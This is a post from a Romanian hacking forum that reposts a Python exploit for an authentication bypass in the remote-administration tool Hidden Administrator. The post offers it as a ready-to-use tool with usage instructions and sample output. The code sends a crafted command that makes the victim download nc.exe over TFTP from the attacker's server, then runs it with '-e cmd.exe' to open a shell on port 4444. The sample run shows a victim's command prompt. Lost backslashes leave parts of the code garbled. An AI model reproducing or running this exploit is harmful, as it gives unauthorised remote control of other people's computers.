Hacking and more...
HaCkinG CulT
|
Lista Forumurilor Pe Tematici
|
Hacking and more... | Reguli | Inregistrare | Login
POZE HACKING AND MORE...
Nu sunteti logat.
|
Nou pe simpatie: i.oana 20 ani
| Femeie 20 ani Bucuresti cauta Barbat 20 - 45 ani |
|
Ras
Little Kevin
Inregistrat: acum 17 ani
Postari: 45
|
|
Code:
####################################################################################
# Hidden Administrator Authenticaiton Bypass Exploit #
# ahmed[at]rewterz.com #
# http://www.securityfocus.com/bid/24049 #
# #
# C:>python rewt-ha-exp.py #
# Usage: rewt-ha-exp.py -h <host ip> -p <port> -t <tftpd server ip> #
# make sure nc.exe exists on tftpd server #
# #
# C:>telnet 192.168.1.4 4444 #
# C:>python rewt-ha-exp.py -h 192.168.1.4 -p 3128 -t 192.168.1.105 #
# [+] Connecting to 192.168.1.4 #
# [+] Uploading Files #
# [+] DONE [+] #
# [+] Now Connect to port 4444 on victim IP !!! #
# #
# C:>telnet 192.168.1.4 4444 #
# Mcft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Mcft Corp. #
# C:ha_server> #
####################################################################################
import socket
import struct
import time
import sys
import getopt
def usage():
print "n"
print "######################################################"
print "# Hidden Administrator Authentication Bypass Exploit #"
print "# Coded By ahmed[at]rewterz.com #"
print "######################################################"
print "n"
print "Usage: %s -h <host ip> -p <port> -t <tftpd server ip>" % sys.argv[0]
print "make sure nc.exe exists on tftpd servern"
def exploit():
h ="%X" % (130+len(tftpd))
buff1='_file_manager_operations_copy_files_Loc_Rem_c:\^filernx0brewt_ha.bat'
buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
buff1+='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
buff1+='x00x00x00x00x00x00x00x00x00x00'
buff1 += ('\x' + h).decode('string_escape')
buff1 += 'x00x00x00x00x00x00x00'
buff1+='x00tftp -i ' + tftpd + ' GET nc.exe c:\nc.exe '
buff1+='rnc:\nc.exe -L -d -p 4444 -e cmd.exe rnrn '
buff1+=' rnrn_file_manager_operations_get_cur_dir_c:rn'
try:
print "[+] Connecting to %s" %host
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,int(port)))
print "[+] Uploading Files"
s.send(buff1)
time.sleep(2)
s.send('+run_C:\rewt_ha.bat|rn')
time.sleep(1)
print "[+] DONE [+]"
print "[+] Now Connect to port 4444 on victim IP !!!"
except:
print "[+] Could not connect to the server"
if len(sys.argv)<7:
usage()
sys.exit()
try:
options = getopt.getopt(sys.argv[1:], 'h:p:t:')[0]
except getopt.GetoptError, err:
print err
usage()
sys.exit()
for option, value in options:
if option == '-h':
host = value
if option == '-p':
port = int(value)
if option == '-t':
tftpd=value
exploit() |
|
|
pus acum 17 ani |
|